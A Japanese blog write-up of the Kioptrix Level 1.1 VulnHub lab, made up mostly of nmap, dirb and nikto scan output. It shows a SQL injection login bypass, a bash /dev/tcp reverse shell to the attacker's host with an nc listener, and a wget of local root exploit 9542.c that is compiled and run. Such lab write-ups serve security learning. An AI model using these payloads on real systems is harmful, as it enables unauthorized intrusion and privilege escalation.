【WriteUp】Kioptrix Level1.1

はじめに

またいつぞやのリベンジ

Kioptrixの続編を独力でプレイ

 

 

使用ツール

nmap

nikto

dirb

 

 

偵察

% nmap -sS -sV -A -T5 -p 1-20000 192.168.3.30

 

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 11:15 EDT
Nmap scan report for 192.168.3.30
Host is up (0.0012s latency).
Not shown: 9993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 *1
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:EF:7A:CC (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds

 

結果、動作しているサービスは以下

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 *2
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)

 

% dirb http://192.168.3.30

 


-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Mar 28 11:15:48 2020
URL_BASE: http://192.168.3.30/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.3.30/ ----
+ http://192.168.3.30/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.3.30/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.3.30/manual/
+ http://192.168.3.30/usage (CODE:403|SIZE:285)

---- Entering directory: http://192.168.3.30/manual/ ----
==> DIRECTORY: http://192.168.3.30/manual/de/
==> DIRECTORY: http://192.168.3.30/manual/developer/
==> DIRECTORY: http://192.168.3.30/manual/en/
==> DIRECTORY: http://192.168.3.30/manual/faq/
==> DIRECTORY: http://192.168.3.30/manual/fr/
==> DIRECTORY: http://192.168.3.30/manual/howto/
==> DIRECTORY: http://192.168.3.30/manual/images/
+ http://192.168.3.30/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.3.30/manual/ja/
==> DIRECTORY: http://192.168.3.30/manual/ko/
+ http://192.168.3.30/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/misc/
==> DIRECTORY: http://192.168.3.30/manual/mod/
==> DIRECTORY: http://192.168.3.30/manual/programs/
==> DIRECTORY: http://192.168.3.30/manual/ru/
==> DIRECTORY: http://192.168.3.30/manual/ssl/
==> DIRECTORY: http://192.168.3.30/manual/style/

---- Entering directory: http://192.168.3.30/manual/de/ ----
+ http://192.168.3.30/manual/de/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/developer/
+ http://192.168.3.30/manual/de/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/faq/
+ http://192.168.3.30/manual/de/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/howto/
==> DIRECTORY: http://192.168.3.30/manual/de/images/
+ http://192.168.3.30/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.3.30/manual/de/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/de/misc/
==> DIRECTORY: http://192.168.3.30/manual/de/mod/
==> DIRECTORY: http://192.168.3.30/manual/de/programs/
+ http://192.168.3.30/manual/de/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/ssl/
==> DIRECTORY: http://192.168.3.30/manual/de/style/

---- Entering directory: http://192.168.3.30/manual/developer/ ----
+ http://192.168.3.30/manual/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/en/ ----
+ http://192.168.3.30/manual/en/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/developer/
+ http://192.168.3.30/manual/en/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/faq/
+ http://192.168.3.30/manual/en/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/howto/
==> DIRECTORY: http://192.168.3.30/manual/en/images/
+ http://192.168.3.30/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/en/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/en/misc/
==> DIRECTORY: http://192.168.3.30/manual/en/mod/
==> DIRECTORY: http://192.168.3.30/manual/en/programs/
+ http://192.168.3.30/manual/en/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/ssl/
==> DIRECTORY: http://192.168.3.30/manual/en/style/

---- Entering directory: http://192.168.3.30/manual/faq/ ----
+ http://192.168.3.30/manual/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/fr/ ----
+ http://192.168.3.30/manual/fr/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/developer/
+ http://192.168.3.30/manual/fr/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/faq/
+ http://192.168.3.30/manual/fr/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/howto/
==> DIRECTORY: http://192.168.3.30/manual/fr/images/
+ http://192.168.3.30/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/fr/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/fr/misc/
==> DIRECTORY: http://192.168.3.30/manual/fr/mod/
==> DIRECTORY: http://192.168.3.30/manual/fr/programs/
+ http://192.168.3.30/manual/fr/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/ssl/
==> DIRECTORY: http://192.168.3.30/manual/fr/style/

---- Entering directory: http://192.168.3.30/manual/howto/ ----
+ http://192.168.3.30/manual/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/ ----
+ http://192.168.3.30/manual/ja/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/developer/
+ http://192.168.3.30/manual/ja/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/faq/
+ http://192.168.3.30/manual/ja/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/howto/
==> DIRECTORY: http://192.168.3.30/manual/ja/images/
+ http://192.168.3.30/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.3.30/manual/ja/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ja/misc/
==> DIRECTORY: http://192.168.3.30/manual/ja/mod/
==> DIRECTORY: http://192.168.3.30/manual/ja/programs/
+ http://192.168.3.30/manual/ja/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ja/style/

---- Entering directory: http://192.168.3.30/manual/ko/ ----
+ http://192.168.3.30/manual/ko/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/developer/
+ http://192.168.3.30/manual/ko/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/faq/
+ http://192.168.3.30/manual/ko/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/howto/
==> DIRECTORY: http://192.168.3.30/manual/ko/images/
+ http://192.168.3.30/manual/ko/index.html (CODE:200|SIZE:6954)
+ http://192.168.3.30/manual/ko/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ko/misc/
==> DIRECTORY: http://192.168.3.30/manual/ko/mod/
==> DIRECTORY: http://192.168.3.30/manual/ko/programs/
+ http://192.168.3.30/manual/ko/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ko/style/

---- Entering directory: http://192.168.3.30/manual/misc/ ----
+ http://192.168.3.30/manual/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/mod/ ----
+ http://192.168.3.30/manual/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/programs/ ----
+ http://192.168.3.30/manual/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/ru/ ----
+ http://192.168.3.30/manual/ru/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/developer/
+ http://192.168.3.30/manual/ru/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/faq/
+ http://192.168.3.30/manual/ru/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/howto/
==> DIRECTORY: http://192.168.3.30/manual/ru/images/
+ http://192.168.3.30/manual/ru/index.html (CODE:200|SIZE:7277)
+ http://192.168.3.30/manual/ru/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ru/misc/
==> DIRECTORY: http://192.168.3.30/manual/ru/mod/
==> DIRECTORY: http://192.168.3.30/manual/ru/programs/
+ http://192.168.3.30/manual/ru/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ru/style/

---- Entering directory: http://192.168.3.30/manual/ssl/ ----
+ http://192.168.3.30/manual/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/de/developer/ ----
+ http://192.168.3.30/manual/de/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/de/faq/ ----
+ http://192.168.3.30/manual/de/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/de/howto/ ----
+ http://192.168.3.30/manual/de/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/de/misc/ ----
+ http://192.168.3.30/manual/de/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/de/mod/ ----
+ http://192.168.3.30/manual/de/mod/index.html (CODE:200|SIZE:13561)

---- Entering directory: http://192.168.3.30/manual/de/programs/ ----
+ http://192.168.3.30/manual/de/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/de/ssl/ ----
+ http://192.168.3.30/manual/de/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/en/developer/ ----
+ http://192.168.3.30/manual/en/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/en/faq/ ----
+ http://192.168.3.30/manual/en/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/en/howto/ ----
+ http://192.168.3.30/manual/en/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/en/misc/ ----
+ http://192.168.3.30/manual/en/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/en/mod/ ----
+ http://192.168.3.30/manual/en/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/en/programs/ ----
+ http://192.168.3.30/manual/en/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/en/ssl/ ----
+ http://192.168.3.30/manual/en/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/fr/developer/ ----
+ http://192.168.3.30/manual/fr/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/fr/faq/ ----
+ http://192.168.3.30/manual/fr/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/fr/howto/ ----
+ http://192.168.3.30/manual/fr/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/fr/misc/ ----
+ http://192.168.3.30/manual/fr/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/fr/mod/ ----
+ http://192.168.3.30/manual/fr/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/fr/programs/ ----
+ http://192.168.3.30/manual/fr/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/fr/ssl/ ----
+ http://192.168.3.30/manual/fr/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/developer/ ----
+ http://192.168.3.30/manual/ja/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ja/faq/ ----
+ http://192.168.3.30/manual/ja/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/ja/howto/ ----
+ http://192.168.3.30/manual/ja/howto/index.html (CODE:200|SIZE:5607)

---- Entering directory: http://192.168.3.30/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/misc/ ----
+ http://192.168.3.30/manual/ja/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ja/mod/ ----
+ http://192.168.3.30/manual/ja/mod/index.html (CODE:200|SIZE:13298)

---- Entering directory: http://192.168.3.30/manual/ja/programs/ ----
+ http://192.168.3.30/manual/ja/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/ja/ssl/ ----
+ http://192.168.3.30/manual/ja/ssl/index.html (CODE:200|SIZE:3957)

---- Entering directory: http://192.168.3.30/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ko/developer/ ----
+ http://192.168.3.30/manual/ko/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ko/faq/ ----
+ http://192.168.3.30/manual/ko/faq/index.html (CODE:200|SIZE:3371)

---- Entering directory: http://192.168.3.30/manual/ko/howto/ ----
+ http://192.168.3.30/manual/ko/howto/index.html (CODE:200|SIZE:5299)

---- Entering directory: http://192.168.3.30/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ko/misc/ ----
+ http://192.168.3.30/manual/ko/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ko/mod/ ----
+ http://192.168.3.30/manual/ko/mod/index.html (CODE:200|SIZE:12795)

---- Entering directory: http://192.168.3.30/manual/ko/programs/ ----
+ http://192.168.3.30/manual/ko/programs/index.html (CODE:200|SIZE:4543)

---- Entering directory: http://192.168.3.30/manual/ko/ssl/ ----
+ http://192.168.3.30/manual/ko/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ru/developer/ ----
+ http://192.168.3.30/manual/ru/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ru/faq/ ----
+ http://192.168.3.30/manual/ru/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/ru/howto/ ----
+ http://192.168.3.30/manual/ru/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ru/misc/ ----
+ http://192.168.3.30/manual/ru/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ru/mod/ ----
+ http://192.168.3.30/manual/ru/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/ru/programs/ ----
+ http://192.168.3.30/manual/ru/programs/index.html (CODE:200|SIZE:5016)

---- Entering directory: http://192.168.3.30/manual/ru/ssl/ ----
+ http://192.168.3.30/manual/ru/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Mar 28 11:33:05 2020
DOWNLOADED: 262884 - FOUND: 102

 

結果、めぼしいものは特になし

 

 

%nikto 192.168.3.30

 

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.30
+ Target Hostname: 192.168.3.30
+ Target Port: 80
+ Start Time: 2020-03-28 20:56:51 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2020-03-28 20:58:08 (GMT-4) (77 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

 

結果、こちらも特にめぼしいものはなし

 

 

普通にブラウザで確認すると、ログイン画面らしきものが出てくる

f:id:syachineko:20200331091547p:plain

 

 

侵入

SSH上での侵入を試みる

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh 192.168.3.30
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
kali@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh admin@192.168.3.30
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
admin@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh root@192.168.3.30
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
root@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$

 

PW認証が使えるため、ブルートフォースも有効な気がするが、後回し

 

 

 

ブラウザ上での侵入を試みる

いくつかのユーザ名によるログインは不発に終わったので、

SQLインジェクションを試みる

 

ID: ' OR 1 = 1 --

PW: ' OR 1 = 1 --

 

結果、認証ページのバイパスに成功

次画面として、WebConsole画面が表示される

f:id:syachineko:20200331093037p:plain

 

pentestmonkyより、revease shellのcheat xheetを参考にして

bashのリバースシェルを試す

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

 

bashはこれ

bash -i >& /dev/tcp/192.168.3.27/8080 0>&1

 

 

kali側で、ncをつかって待ち構えておく

% nc -l 192.168.3.27 -p 8080

 

 

その後、上記のリバースシェル用bashに ; を追加して実行

ブラウザが読み込み中で止まり、kali側でbashが立ち上がった

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ nc -l -p 8080
bash: no job control in this shell
bash-3.00$ whoami
apache
bash-3.00$

 

権限昇格

権限昇格を狙って探索を行うと、以下のファイルにOSの情報が記載されている

 % cat /etc/redhat-release

bash-3.00$ cat redhat-release
CentOS release 4.5 (Final)
 

 

記載されたバージョンで権限昇格が可能か、

searchsploitで検索したところ、コードが見つかった

f:id:syachineko:20200401001001p:plain

これの上側のexplot code
  

 

該当コードがローカルで動作するものなので、

Kaliから簡易サーバーをたてて転送する

 % python -m SimpleHTTPServer 8080

 

 

サーバ上で/tmpに移動して、

% wget "http://192.168.3.27:8080/9542.c

 

 

送り込んだコードをコンパイルして、実行

 gcc -o exploit 9542.c

 ./exploit

 

 

権限取得まで行うことができた

f:id:syachineko:20200401001531p:plain


  

この後

バックドアの作成

・ほかの人のwriteupを確認して勉強

・使用済みツールを使わない攻略

   などなどやりたい 

 

以上

 

 

 

 

 

 

 

 

*1:CentOS

*2:CentOS